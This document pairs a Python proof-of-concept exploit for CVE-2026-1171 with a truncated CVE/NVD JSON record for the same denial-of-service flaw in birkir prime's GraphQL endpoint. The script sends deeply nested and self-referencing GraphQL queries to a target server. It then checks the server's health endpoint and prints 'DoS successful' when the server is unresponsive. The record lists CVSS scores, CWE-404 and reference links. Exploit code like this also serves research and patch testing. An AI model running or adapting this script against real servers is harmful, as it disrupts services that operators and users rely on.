CVE-2026-1171

# CVE-2026-1171 PoC - birkir prime GraphQL DoS # Target: birkir prime <= 0.4.0.beta.0 # Endpoint: /graphql import requests import json TARGET_URL = "http://target-server/graphql" def check_version(): """Check if target is vulnerable""" query = """ { __typename } """ response = requests.post(TARGET_URL, json={"query": query}) return response.status_code == 200 def exploit_dos(): """Trigger DoS condition""" # Deeply nested query to trigger resource exhaustion malicious_query = """ query { nested1 { nested2 { nested3 { nested4 { nested5 { field1 field2 field3 field4 field5 } } } } } } """ # Alternative: Circular reference query circular_query = """ query { self: self { self { self { self { id } } } } } """ try: print("Sending malicious GraphQL query...") response = requests.post( TARGET_URL, json={"query": malicious_query}, timeout=10 ) print(f"Response status: {response.status_code}") # Check if server is still responsive check = requests.get("http://target-server/health", timeout=5) if check.status_code != 200: print("DoS successful - server unresponsive") return True except requests.exceptions.Timeout: print("DoS successful - request timeout") return True except Exception as e: print(f"Error: {e}") return False if __name__ == "__main__": if check_version(): print("Target appears to be running birkir prime") exploit_dos() else: print("Target not vulnerable or not birkir prime")

{"cve": {"id": "CVE-2026-1171", "sourceIdentifier": "[email protected]", "published": "2026-01-19T19:16:03.373", "lastModified": "2026-02-23T09:16:49.120", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in birkir prime up to 0.4.0.beta.0. Impacted is an unknown function of the file /graphql of the component GraphQL Field Handler. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha encontrado un fallo en birkir prime hasta la versión 0.4.0.beta.0. Se ve afectada una función desconocida del archivo /graphql del componente GraphQL Field Handler. La ejecución de una manipulación puede llevar a una denegación de servicio. El ataque puede lanzarse remotamente. El exploit ha sido publicado y puede utilizarse. Se informó al proyecto del problema con antelación a través de un informe de incidencias, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.4.0", "matchCriteriaId": "65419F9E-4813-4B36-BA74-1839A5525EFC"}]}]}], "references": [{"url": "https://github.com/birkir/prime/", "source": "[email protected]"}, {"url": "https://github.com/birkir/prime/issues/542", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.341765", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341765", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https ... (truncated)